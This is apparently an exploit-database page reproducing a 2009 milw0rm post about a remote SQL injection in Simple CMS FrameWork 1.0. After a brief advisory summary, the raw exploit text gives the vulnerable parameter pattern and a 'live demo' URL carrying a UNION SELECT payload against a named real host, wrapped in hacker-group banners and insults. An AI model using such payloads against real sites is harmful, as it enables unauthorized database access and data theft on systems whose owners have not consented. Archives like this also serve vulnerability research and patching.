header-logo
Suggest Exploit
vendor:
Simple CMS FrameWork
by:
Red-D3v1L
N/A
CVSS
N/A
Remote SQL Injection
Unknown
CWE
Product Name: Simple CMS FrameWork
Affected Version From: Simple CMS FrameWork 1.0
Affected Version To: Simple CMS FrameWork 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Simple CMS FrameWork 1.0 Remote SQL Injection Vulnerability

The Simple CMS Framework version 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by injecting SQL code into the 'id' parameter in the 'index.php' file. This can lead to unauthorized access to the database and potential data leakage. An example of the exploit URL is provided in the text.

Mitigation:

Unknown
Source

Exploit-DB raw data:

==============================================================================
  ##  Hackteach.OrG ##
             

/ ___   )(  __   )/ ___   )
\/   )  || (  )  |\/   )  |
    /   )| | /   |    /   )
   /   / | (/ /) |   /   / 
  /   /  |   / | |  /   /  
 /   (_/\|  (__) | /   (_/\
(_______/(_______)(_______/
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  Simple CMS FrameWork <== 1.0 Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:             [ Hackteach.org ]
    [»] Script:              [ Simple CMS FrameWork ]
    [»] Language:            [ PHP ]
    [»] Home:                [ http://westlingit.com/cms.php ]
    [»] Founder:             [ Red-D3v1L < php-c0de@hotmail.com > SQL@Hotmail.eS < ]
    [»] Gr44tz to:           [ All member Hackteach.org/cc - Str0ke - sp3x ]
    [»] Fuck To :            [ Anti-trust << Big Big Big Lamer << ]
########################################################################

===[ Exploit SQL ]===  

 [»] [Path]/index.php?id=null&page=[SQL]

 [»] L1v3 d3m0 : 

http://dev.westlingit.com/simplecms/index.php?id=null&page=-0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19 


Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-26]